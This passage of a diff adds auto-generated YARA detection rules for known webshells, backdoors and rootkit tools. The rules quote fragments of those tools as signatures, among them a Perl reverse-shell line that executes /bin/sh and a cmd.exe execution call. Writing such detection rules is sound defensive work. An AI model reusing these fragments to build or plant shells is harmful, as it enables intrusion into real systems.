+ hash = "bd3a0b7a6b5536f8d96f50956560e9bf"
+ strings:
+ $s5 = "/THUMBPOSITION7"
+ $s6 = "\\EvilBlade\\"
+ condition:
+ all of them
+}
+rule phpshell {
+ meta:
+ description = "Webshells Auto-generated - file phpshell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "1dccb1ea9f24ffbd085571c88585517b"
+ strings:
+ $s1 = "echo \"<input size=\\\"100\\\" type=\\\"text\\\" name=\\\"newfile\\\" value=\\\"$inputfile\\\"><b"
+ $s2 = "$img[$id] = \"<img height=\\\"16\\\" width=\\\"16\\\" border=\\\"0\\\" src=\\\"$REMOTE_IMAGE_UR"
+ $s3 = "$file = str_replace(\"\\\\\", \"/\", str_replace(\"//\", \"/\", str_replace(\"\\\\\\\\\", \"\\\\\", "
+ condition:
+ all of them
+}
+rule FSO_s_cmd {
+ meta:
+ description = "Webshells Auto-generated - file cmd.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "cbe8e365d41dd3cd8e462ca434cf385f"
+ strings:
+ $s0 = "<%= \"\\\\\" & oScriptNet.ComputerName & \"\\\" & oScriptNet.UserName %>"
+ $s1 = "Call oScript.Run (\"cmd.exe /c \" & szCMD & \" > \" & szTempFile, 0, True)"
+ condition:
+ all of them
+}
+rule FeliksPack3___PHP_Shells_phpft {
+ meta:
+ description = "Webshells Auto-generated - file phpft.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "60ef80175fcc6a879ca57c54226646b1"
+ strings:
+ $s6 = "PHP Files Thief"
+ $s11 = "http://www.4ngel.net"
+ condition:
+ all of them
+}
+rule FSO_s_indexer {
+ meta:
+ description = "Webshells Auto-generated - file indexer.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "135fc50f85228691b401848caef3be9e"
+ strings:
+ $s3 = "<td>Nereye :<td><input type=\"text\" name=\"nereye\" size=25></td><td><input type=\"r"
+ condition:
+ all of them
+}
+rule r57shell {
+ meta:
+ description = "Webshells Auto-generated - file r57shell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "8023394542cddf8aee5dec6072ed02b5"
+ strings:
+ $s11 = " $_POST['cmd']=\"echo \\\"Now script try connect to"
+ condition:
+ all of them
+}
+rule bdcli100 {
+ meta:
+ description = "Webshells Auto-generated - file bdcli100.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b12163ac53789fb4f62e4f17a8c2e028"
+ strings:
+ $s5 = "unable to connect to "
+ $s8 = "backdoor is corrupted on "
+ condition:
+ all of them
+}
+rule HYTop_DevPack_2005Red {
+ meta:
+ description = "Webshells Auto-generated - file 2005Red.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "d8ccda2214b3f6eabd4502a050eb8fe8"
+ strings:
+ $s0 = "scrollbar-darkshadow-color:#FF9DBB;"
+ $s3 = "echo \" <a href=\"\"/\"&encodeForUrl(theHref,false)&\"\"\" target=_blank>\"&replace"
+ $s9 = "theHref=mid(replace(lcase(list.path),lcase(server.mapPath(\"/\")),\"\"),2)"
+ condition:
+ all of them
+}
+rule HYTop2006_rar_Folder_2006X2 {
+ meta:
+ description = "Webshells Auto-generated - file 2006X2.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "cc5bf9fc56d404ebbc492855393d7620"
+ strings:
+ $s2 = "Powered By "
+ $s3 = " \" onClick=\"this.form.sharp.name=this.form.password.value;this.form.action=this."
+ condition:
+ all of them
+}
+rule rdrbs084 {
+ meta:
+ description = "Webshells Auto-generated - file rdrbs084.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "ed30327b255816bdd7590bf891aa0020"
+ strings:
+ $s0 = "Create mapped port. You have to specify domain when using HTTP type."
+ $s8 = "<LOCAL PORT> <MAPPING SERVER> <MAPPING SERVER PORT> <TARGET SERVER> <TARGET"
+ condition:
+ all of them
+}
+rule HYTop_CaseSwitch_2005 {
+ meta:
+ description = "Webshells Auto-generated - file 2005.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "8bf667ee9e21366bc0bd3491cb614f41"
+ strings:
+ $s1 = "MSComDlg.CommonDialog"
+ $s2 = "CommonDialog1"
+ $s3 = "__vbaExceptHandler"
+ $s4 = "EVENT_SINK_Release"
+ $s5 = "EVENT_SINK_AddRef"
+ $s6 = "By Marcos"
+ $s7 = "EVENT_SINK_QueryInterface"
+ $s8 = "MethCallEngine"
+ condition:
+ all of them
+}
+rule eBayId_index3 {
+ meta:
+ description = "Webshells Auto-generated - file index3.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "0412b1e37f41ea0d002e4ed11608905f"
+ strings:
+ $s8 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"You"
+ condition:
+ all of them
+}
+rule FSO_s_phvayv {
+ meta:
+ description = "Webshells Auto-generated - file phvayv.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "205ecda66c443083403efb1e5c7f7878"
+ strings:
+ $s2 = "wrap=\"OFF\">XXXX</textarea></font><font face"
+ condition:
+ all of them
+}
+rule byshell063_ntboot {
+ meta:
+ description = "Webshells Auto-generated - file ntboot.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "99b5f49db6d6d9a9faeffb29fd8e6d8c"
+ strings:
+ $s0 = "SYSTEM\\CurrentControlSet\\Services\\NtBoot"
+ $s1 = "Failure ... Access is Denied !"
+ $s2 = "Dumping Description to Registry..."
+ $s3 = "Opening Service .... Failure !"
+ condition:
+ all of them
+}
+rule FSO_s_casus15_2 {
+ meta:
+ description = "Webshells Auto-generated - file casus15.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "8d155b4239d922367af5d0a1b89533a3"
+ strings:
+ $s0 = "copy ( $dosya_gonder"
+ condition:
+ all of them
+}
+rule installer {
+ meta:
+ description = "Webshells Auto-generated - file installer.cmd"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "a507919ae701cf7e42fa441d3ad95f8f"
+ strings:
+ $s0 = "Restore Old Vanquish"
+ $s4 = "ReInstall Vanquish"
+ condition:
+ all of them
+}
+rule uploader {
+ meta:
+ description = "Webshells Auto-generated - file uploader.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b9a9aab319964351b46bd5fc9d6246a8"
+ strings:
+ $s0 = "move_uploaded_file($userfile, \"entrika.php\"); "
+ condition:
+ all of them
+}
+rule FSO_s_remview_2 {
+ meta:
+ description = "Webshells Auto-generated - file remview.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b4a09911a5b23e00b55abe546ded691c"
+ strings:
+ $s0 = "<xmp>$out</"
+ $s1 = ".mm(\"Eval PHP code\")."
+ condition:
+ all of them
+}
+rule FeliksPack3___PHP_Shells_r57 {
+ meta:
+ description = "Webshells Auto-generated - file r57.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "903908b77a266b855262cdbce81c3f72"
+ strings:
+ $s1 = "$sql = \"LOAD DATA INFILE \\\"\".$_POST['test3_file']."
+ condition:
+ all of them
+}
+rule HYTop2006_rar_Folder_2006X {
+ meta:
+ description = "Webshells Auto-generated - file 2006X.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "cf3ee0d869dd36e775dfcaa788db8e4b"
+ strings:
+ $s1 = "<input name=\"password\" type=\"password\" id=\"password\""
+ $s6 = "name=\"theAction\" type=\"text\" id=\"theAction\""
+ condition:
+ all of them
+}
+rule FSO_s_phvayv_2 {
+ meta:
+ description = "Webshells Auto-generated - file phvayv.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "205ecda66c443083403efb1e5c7f7878"
+ strings:
+ $s2 = "rows=\"24\" cols=\"122\" wrap=\"OFF\">XXXX</textarea></font><font"
+ condition:
+ all of them
+}
+rule elmaliseker {
+ meta:
+ description = "Webshells Auto-generated - file elmaliseker.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "ccf48af0c8c09bbd038e610a49c9862e"
+ strings:
+ $s0 = "javascript:Command('Download'"
+ $s5 = "zombie_array=array("
+ condition:
+ all of them
+}
+rule shelltools_g0t_root_resolve {
+ meta:
+ description = "Webshells Auto-generated - file resolve.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "69bf9aa296238610a0e05f99b5540297"
+ strings:
+ $s0 = "3^n6B(Ed3"
+ $s1 = "^uldn'Vt(x"
+ $s2 = "\\= uPKfp"
+ $s3 = "'r.axV<ad"
+ $s4 = "p,modoi$=sr("
+ $s5 = "DiamondC8S t"
+ $s6 = "`lQ9fX<ZvJW"
+ condition:
+ all of them
+}
+rule FSO_s_RemExp {
+ meta:
+ description = "Webshells Auto-generated - file RemExp.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b69670ecdbb40012c73686cd22696eeb"
+ strings:
+ $s1 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=SubFolder.Name%>\"> <a href= \"<%=Request.Ser"
+ $s5 = "<td bgcolor=\"<%=BgColor%>\" title=\"<%=File.Name%>\"> <a href= \"showcode.asp?f=<%=F"
+ $s6 = "<td bgcolor=\"<%=BgColor%>\" align=\"right\"><%=Attributes(SubFolder.Attributes)%></"
+ condition:
+ all of them
+}
+rule FSO_s_tool {
+ meta:
+ description = "Webshells Auto-generated - file tool.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "3a1e1e889fdd974a130a6a767b42655b"
+ strings:
+ $s7 = "\"\"%windir%\\\\calc.exe\"\")"
+ condition:
+ all of them
+}
+rule FeliksPack3___PHP_Shells_2005 {
+ meta:
+ description = "Webshells Auto-generated - file 2005.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "97f2552c2fafc0b2eb467ee29cc803c8"
+ strings:
+ $s0 = "window.open(\"\"&url&\"?id=edit&path=\"+sfile+\"&op=copy&attrib=\"+attrib+\"&dpath=\"+lp"
+ $s3 = "<input name=\"dbname\" type=\"hidden\" id=\"dbname\" value=\"<%=request(\"dbname\")%>\">"
+ condition:
+ all of them
+}
+rule byloader {
+ meta:
+ description = "Webshells Auto-generated - file byloader.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "0f0d6dc26055653f5844ded906ce52df"
+ strings:
+ $s0 = "SYSTEM\\CurrentControlSet\\Services\\NtfsChk"
+ $s1 = "Failure ... Access is Denied !"
+ $s2 = "NTFS Disk Driver Checking Service"
+ $s3 = "Dumping Description to Registry..."
+ $s4 = "Opening Service .... Failure !"
+ condition:
+ all of them
+}
+rule shelltools_g0t_root_Fport {
+ meta:
+ description = "Webshells Auto-generated - file Fport.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "dbb75488aa2fa22ba6950aead1ef30d5"
+ strings:
+ $s4 = "Copyright 2000 by Foundstone, Inc."
+ $s5 = "You must have administrator privileges to run fport - exiting..."
+ condition:
+ all of them
+}
+rule BackDooR__fr_ {
+ meta:
+ description = "Webshells Auto-generated - file BackDooR (fr).php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "a79cac2cf86e073a832aaf29a664f4be"
+ strings:
+ $s3 = "print(\"<p align=\\\"center\\\"><font size=\\\"5\\\">Exploit include "
+ condition:
+ all of them
+}
+rule FSO_s_ntdaddy {
+ meta:
+ description = "Webshells Auto-generated - file ntdaddy.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "f6262f3ad9f73b8d3e7d9ea5ec07a357"
+ strings:
+ $s1 = "<input type=\"text\" name=\".CMD\" size=\"45\" value=\"<%= szCMD %>\"> <input type=\"s"
+ condition:
+ all of them
+}
+rule nstview_nstview {
+ meta:
+ description = "Webshells Auto-generated - file nstview.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "3871888a0c1ac4270104918231029a56"
+ strings:
+ $s4 = "open STDIN,\\\"<&X\\\";open STDOUT,\\\">&X\\\";open STDERR,\\\">&X\\\";exec(\\\"/bin/sh -i\\\");"
+ condition:
+ all of them
+}
+rule HYTop_DevPack_upload {
+ meta:
+ description = "Webshells Auto-generated - file upload.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b09852bda534627949f0259828c967de"
+ strings:
+ $s0 = "<!-- PageUpload Below -->"
+ condition:
+ all of them
+}
+rule PasswordReminder {
+ meta:
+ description = "Webshells Auto-generated - file PasswordReminder.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "ea49d754dc609e8bfa4c0f95d14ef9bf"
+ strings:
+ $s3 = "The encoded password is found at 0x%8.8lx and has a length of %d."
+ condition:
+ all of them
+}
+rule Pack_InjectT {
+ meta:
+ description = "Webshells Auto-generated - file InjectT.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "983b74ccd57f6195a0584cdfb27d55e8"
+ strings:
+ $s3 = "ail To Open Registry"
+ $s4 = "32fDssignim"
+ $s5 = "vide Internet S"
+ $s6 = "d]Software\\M"
+ $s7 = "TInject.Dll"
+ condition:
+ all of them
+}
+rule FSO_s_RemExp_2 {
+ meta:
+ description = "Webshells Auto-generated - file RemExp.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b69670ecdbb40012c73686cd22696eeb"
+ strings:
+ $s2 = " Then Response.Write \""
+ $s3 = "<a href= \"<%=Request.ServerVariables(\"script_name\")%>"
+ condition:
+ all of them
+}
+rule FSO_s_c99 {
+ meta:
+ description = "Webshells Auto-generated - file c99.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "5f9ba02eb081bba2b2434c603af454d0"
+ strings:
+ $s2 = "\"txt\",\"conf\",\"bat\",\"sh\",\"js\",\"bak\",\"doc\",\"log\",\"sfc\",\"cfg\",\"htacce"
+ condition:
+ all of them
+}
+rule rknt_zip_Folder_RkNT {
+ meta:
+ description = "Webshells Auto-generated - file RkNT.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "5f97386dfde148942b7584aeb6512b85"
+ strings:
+ $s0 = "PathStripPathA"
+ $s1 = "`cLGet!Addr%"
+ $s2 = "$Info: This file is packed with the UPX executable packer http://upx.tsx.org $"
+ $s3 = "oQToOemBuff* <="
+ $s4 = "ionCdunAsw[Us'"
+ $s6 = "CreateProcessW: %S"
+ $s7 = "ImageDirectoryEntryToData"
+ condition:
+ all of them
+}
+rule dbgntboot {
+ meta:
+ description = "Webshells Auto-generated - file dbgntboot.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "4d87543d4d7f73c1529c9f8066b475ab"
+ strings:
+ $s2 = "now DOS is working at mode %d,faketype %d,against %s,has worked %d minutes,by sp"
+ $s3 = "sth junk the M$ Wind0wZ retur"
+ condition:
+ all of them
+}
+rule PHP_shell {
+ meta:
+ description = "Webshells Auto-generated - file shell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "45e8a00567f8a34ab1cccc86b4bc74b9"
+ strings:
+ $s0 = "AR8iROET6mMnrqTpC6W1Kp/DsTgxNby9H1xhiswfwgoAtED0y6wEXTihoAtICkIX6L1+vTUYWuWz"
+ $s11 = "1HLp1qnlCyl5gko8rDlWHqf8/JoPKvGwEm9Q4nVKvEh0b0PKle3zeFiJNyjxOiVepMSpflJkPv5s"
+ condition:
+ all of them
+}
+rule hxdef100 {
+ meta:
+ description = "Webshells Auto-generated - file hxdef100.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "55cc1769cef44910bd91b7b73dee1f6c"
+ strings:
+ $s0 = "RtlAnsiStringToUnicodeString"
+ $s8 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+ $s9 = "\\\\.\\mailslot\\hxdef-rk100sABCDEFGH"
+ condition:
+ all of them
+}
+rule rdrbs100 {
+ meta:
+ description = "Webshells Auto-generated - file rdrbs100.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "7c752bcd6da796d80a6830c61a632bff"
+ strings:
+ $s3 = "Server address must be IP in A.B.C.D format."
+ $s4 = " mapped ports in the list. Currently "
+ condition:
+ all of them
+}
+rule Mithril_Mithril {
+ meta:
+ description = "Webshells Auto-generated - file Mithril.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "017191562d72ab0ca551eb89256650bd"
+ strings:
+ $s0 = "OpenProcess error!"
+ $s1 = "WriteProcessMemory error!"
+ $s4 = "GetProcAddress error!"
+ $s5 = "HHt`HHt\\"
+ $s6 = "Cmaudi0"
+ $s7 = "CreateRemoteThread error!"
+ $s8 = "Kernel32"
+ $s9 = "VirtualAllocEx error!"
+ condition:
+ all of them
+}
+rule hxdef100_2 {
+ meta:
+ description = "Webshells Auto-generated - file hxdef100.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "1b393e2e13b9c57fb501b7cd7ad96b25"
+ strings:
+ $s0 = "\\\\.\\mailslot\\hxdef-rkc000"
+ $s2 = "Shared Components\\On Access Scanner\\BehaviourBlo"
+ $s6 = "SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\"
+ condition:
+ all of them
+}
+rule Release_dllTest {
+ meta:
+ description = "Webshells Auto-generated - file dllTest.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "76a59fc3242a2819307bb9d593bef2e0"
+ strings:
+ $s0 = ";;;Y;`;d;h;l;p;t;x;|;"
+ $s1 = "0 0&00060K0R0X0f0l0q0w0"
+ $s2 = ": :$:(:,:0:4:8:D:`=d="
+ $s3 = "4@5P5T5\\5T7\\7d7l7t7|7"
+ $s4 = "1,121>1C1K1Q1X1^1e1k1s1y1"
+ $s5 = "9 9$9(9,9P9X9\\9`9d9h9l9p9t9x9|9"
+ $s6 = "0)0O0\\0a0o0\"1E1P1q1"
+ $s7 = "<.<I<d<h<l<p<t<x<|<"
+ $s8 = "3&31383>3F3Q3X3`3f3w3|3"
+ $s9 = "8@;D;H;L;P;T;X;\\;a;9=W=z="
+ condition:
+ all of them
+}
+rule webadmin {
+ meta:
+ description = "Webshells Auto-generated - file webadmin.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "3a90de401b30e5b590362ba2dde30937"
+ strings:
+ $s0 = "<input name=\\\"editfilename\\\" type=\\\"text\\\" class=\\\"style1\\\" value='\".$this->inpu"
+ condition:
+ all of them
+}
+rule commands {
+ meta:
+ description = "Webshells Auto-generated - file commands.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "174486fe844cb388e2ae3494ac2d1ec2"
+ strings:
+ $s1 = "If CheckRecord(\"SELECT COUNT(ID) FROM VictimDetail WHERE VictimID = \" & VictimID"
+ $s2 = "proxyArr = Array (\"HTTP_X_FORWARDED_FOR\",\"HTTP_VIA\",\"HTTP_CACHE_CONTROL\",\"HTTP_F"
+ condition:
+ all of them
+}
+rule hkdoordll {
+ meta:
+ description = "Webshells Auto-generated - file hkdoordll.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b715c009d47686c0e62d0981efce2552"
+ strings:
+ $s6 = "Can't uninstall,maybe the backdoor is not installed or,the Password you INPUT is"
+ condition:
+ all of them
+}
+rule r57shell_2 {
+ meta:
+ description = "Webshells Auto-generated - file r57shell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "8023394542cddf8aee5dec6072ed02b5"
+ strings:
+ $s2 = "echo \"<br>\".ws(2).\"HDD Free : <b>\".view_size($free).\"</b> HDD Total : <b>\".view_"
+ condition:
+ all of them
+}
+rule Mithril_v1_45_dllTest {
+ meta:
+ description = "Webshells Auto-generated - file dllTest.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "1b9e518aaa62b15079ff6edb412b21e9"
+ strings:
+ $s3 = "syspath"
+ $s4 = "\\Mithril"
+ $s5 = "--list the services in the computer"
+ condition:
+ all of them
+}
+rule dbgiis6cli {
+ meta:
+ description = "Webshells Auto-generated - file dbgiis6cli.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "3044dceb632b636563f66fee3aaaf8f3"
+ strings:
+ $s0 = "User-Agent: Mozilla/4.0 (compatible; MSIE 5.01; Windows NT 5.0)"
+ $s5 = "###command:(NO more than 100 bytes!)"
+ condition:
+ all of them
+}
+rule remview_2003_04_22 {
+ meta:
+ description = "Webshells Auto-generated - file remview_2003_04_22.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "17d3e4e39fbca857344a7650f7ea55e3"
+ strings:
+ $s1 = "\"<b>\".mm(\"Eval PHP code\").\"</b> (\".mm(\"don't type\").\" \\\"<?\\\""
+ condition:
+ all of them
+}
+rule FSO_s_test {
+ meta:
+ description = "Webshells Auto-generated - file test.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "82cf7b48da8286e644f575b039a99c26"
+ strings:
+ $s0 = "$yazi = \"test\" . \"\\r\\n\";"
+ $s2 = "fwrite ($fp, \"$yazi\");"
+ condition:
+ all of them
+}
+rule Debug_cress {
+ meta:
+ description = "Webshells Auto-generated - file cress.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "36a416186fe010574c9be68002a7286a"
+ strings:
+ $s0 = "\\Mithril "
+ $s4 = "Mithril.exe"
+ condition:
+ all of them
+}
+rule webshell {
+ meta:
+ description = "Webshells Auto-generated - file webshell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "f2f8c02921f29368234bfb4d4622ad19"
+ strings:
+ $s0 = "RhViRYOzz"
+ $s1 = "d\\O!jWW"
+ $s2 = "bc!jWW"
+ $s3 = "0W[&{l"
+ $s4 = "[INhQ@\\"
+ condition:
+ all of them
+}
+rule FSO_s_EFSO_2 {
+ meta:
+ description = "Webshells Auto-generated - file EFSO_2.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "a341270f9ebd01320a7490c12cb2e64c"
+ strings:
+ $s0 = ";!+/DRknD7+.\\mDrC(V+kcJznndm\\f|nzKuJb'r@!&0KUY@*Jb@#@&Xl\"dKVcJ\\CslU,),@!0KxD~mKV"
+ $s4 = "\\co!VV2CDtSJ'E*#@#@&mKx/DP14lM/nY{JC81N+6LtbL3^hUWa;M/OE-AXX\"b~/fAs!u&9|J\\grKp\"j"
+ condition:
+ all of them
+}
+rule thelast_index3 {
+ meta:
+ description = "Webshells Auto-generated - file index3.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "cceff6dc247aaa25512bad22120a14b4"
+ strings:
+ $s5 = "$err = \"<i>Your Name</i> Not Entered!</font></h2>Sorry, \\\"Your Name\\\" field is r"
+ condition:
+ all of them
+}
+rule adjustcr {
+ meta:
+ description = "Webshells Auto-generated - file adjustcr.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "17037fa684ef4c90a25ec5674dac2eb6"
+ strings:
+ $s0 = "$Info: This file is packed with the UPX executable packer $"
+ $s2 = "$License: NRV for UPX is distributed under special license $"
+ $s6 = "AdjustCR Carr"
+ $s7 = "ION\\System\\FloatingPo"
+ condition:
+ all of them
+}
+rule FeliksPack3___PHP_Shells_xIShell {
+ meta:
+ description = "Webshells Auto-generated - file xIShell.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "997c8437c0621b4b753a546a53a88674"
+ strings:
+ $s3 = "if (!$nix) { $xid = implode(explode(\"\\\\\",$xid),\"\\\\\\\\\");}echo (\"<td><a href='Java"
+ condition:
+ all of them
+}
+rule HYTop_AppPack_2005 {
+ meta:
+ description = "Webshells Auto-generated - file 2005.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "63d9fd24fa4d22a41fc5522fc7050f9f"
+ strings:
+ $s6 = "\" onclick=\"this.form.sqlStr.value='e:\\hytop.mdb"
+ condition:
+ all of them
+}
+rule xssshell {
+ meta:
+ description = "Webshells Auto-generated - file xssshell.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "8fc0ffc5e5fbe85f7706ffc45b3f79b4"
+ strings:
+ $s1 = "if( !getRequest(COMMANDS_URL + \"?v=\" + VICTIM + \"&r=\" + generateID(), \"pushComma"
+ condition:
+ all of them
+}
+rule FeliksPack3___PHP_Shells_usr {
+ meta:
+ description = "Webshells Auto-generated - file usr.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "ade3357520325af50c9098dc8a21a024"
+ strings:
+ $s0 = "<?php $id_info = array('notify' => 'off','sub' => 'aasd','s_name' => 'nurullahor"
+ condition:
+ all of them
+}
+rule FSO_s_phpinj {
+ meta:
+ description = "Webshells Auto-generated - file phpinj.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "dd39d17e9baca0363cc1c3664e608929"
+ strings:
+ $s4 = "echo '<a href='.$expurl.'> Click Here to Exploit </a> <br />';"
+ condition:
+ all of them
+}
+rule xssshell_db {
+ meta:
+ description = "Webshells Auto-generated - file db.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "cb62e2ec40addd4b9930a9e270f5b318"
+ strings:
+ $s8 = "'// By Ferruh Mavituna | http://ferruh.mavituna.com"
+ condition:
+ all of them
+}
+rule PHP_sh {
+ meta:
+ description = "Webshells Auto-generated - file sh.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "1e9e879d49eb0634871e9b36f99fe528"
+ strings:
+ $s1 = "\"@$SERVER_NAME \".exec(\"pwd\")"
+ condition:
+ all of them
+}
+rule xssshell_default {
+ meta:
+ description = "Webshells Auto-generated - file default.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "d156782ae5e0b3724de3227b42fcaf2f"
+ strings:
+ $s3 = "If ProxyData <> \"\" Then ProxyData = Replace(ProxyData, DATA_SEPERATOR, \"<br />\")"
+ condition:
+ all of them
+}
+rule EditServer_2 {
+ meta:
+ description = "Webshells Auto-generated - file EditServer.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "5c1f25a4d206c83cdfb006b3eb4c09ba"
+ strings:
+ $s0 = "@HOTMAIL.COM"
+ $s1 = "Press Any Ke"
+ $s3 = "glish MenuZ"
+ condition:
+ all of them
+}
+rule by064cli {
+ meta:
+ description = "Webshells Auto-generated - file by064cli.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "10e0dff366968b770ae929505d2a9885"
+ strings:
+ $s7 = "packet dropped,redirecting"
+ $s9 = "input the password(the default one is 'by')"
+ condition:
+ all of them
+}
+rule Mithril_dllTest {
+ meta:
+ description = "Webshells Auto-generated - file dllTest.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "a8d25d794d8f08cd4de0c3d6bf389e6d"
+ strings:
+ $s0 = "please enter the password:"
+ $s3 = "\\dllTest.pdb"
+ condition:
+ all of them
+}
+rule peek_a_boo {
+ meta:
+ description = "Webshells Auto-generated - file peek-a-boo.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "aca339f60d41fdcba83773be5d646776"
+ strings:
+ $s0 = "__vbaHresultCheckObj"
+ $s1 = "\\VB\\VB5.OLB"
+ $s2 = "capGetDriverDescriptionA"
+ $s3 = "__vbaExceptHandler"
+ $s4 = "EVENT_SINK_Release"
+ $s8 = "__vbaErrorOverflow"
+ condition:
+ all of them
+}
+rule fmlibraryv3 {
+ meta:
+ description = "Webshells Auto-generated - file fmlibraryv3.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "c34c248fed6d5a20d8203924a2088acc"
+ strings:
+ $s3 = "ExeNewRs.CommandText = \"UPDATE \" & tablename & \" SET \" & ExeNewRsValues & \" WHER"
+ condition:
+ all of them
+}
+rule Debug_dllTest_2 {
+ meta:
+ description = "Webshells Auto-generated - file dllTest.dll"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "1b9e518aaa62b15079ff6edb412b21e9"
+ strings:
+ $s4 = "\\Debug\\dllTest.pdb"
+ $s5 = "--list the services in the computer"
+ condition:
+ all of them
+}
+rule connector {
+ meta:
+ description = "Webshells Auto-generated - file connector.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "3ba1827fca7be37c8296cd60be9dc884"
+ strings:
+ $s2 = "If ( AttackID = BROADCAST_ATTACK )"
+ $s4 = "Add UNIQUE ID for victims / zombies"
+ condition:
+ all of them
+}
+rule shelltools_g0t_root_HideRun {
+ meta:
+ description = "Webshells Auto-generated - file HideRun.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "45436d9bfd8ff94b71eeaeb280025afe"
+ strings:
+ $s0 = "Usage -- hiderun [AppName]"
+ $s7 = "PVAX SW, Alexey A. Popoff, Moscow, 1997."
+ condition:
+ all of them
+}
+rule regshell {
+ meta:
+ description = "Webshells Auto-generated - file regshell.exe"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "db2fdc821ca6091bab3ebd0d8bc46ded"
+ strings:
+ $s0 = "Changes the base hive to HKEY_CURRENT_USER."
+ $s4 = "Displays a list of values and sub-keys in a registry Hive."
+ $s5 = "Enter a menu selection number (1 - 3) or 99 to Exit: "
+ condition:
+ all of them
+}
+rule PHP_Shell_v1_7 {
+ meta:
+ description = "Webshells Auto-generated - file PHP_Shell_v1.7.php"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "b5978501c7112584532b4ca6fb77cba5"
+ strings:
+ $s8 = "<title>[ADDITINAL TITTLE]-phpShell by:[YOURNAME]"
+ condition:
+ all of them
+}
+rule xssshell_save {
+ meta:
+ description = "Webshells Auto-generated - file save.asp"
+ author = "Yara Bulk Rule Generator by Florian Roth"
+ hash = "865da1b3974e940936fe38e8e1964980"
+ strings:
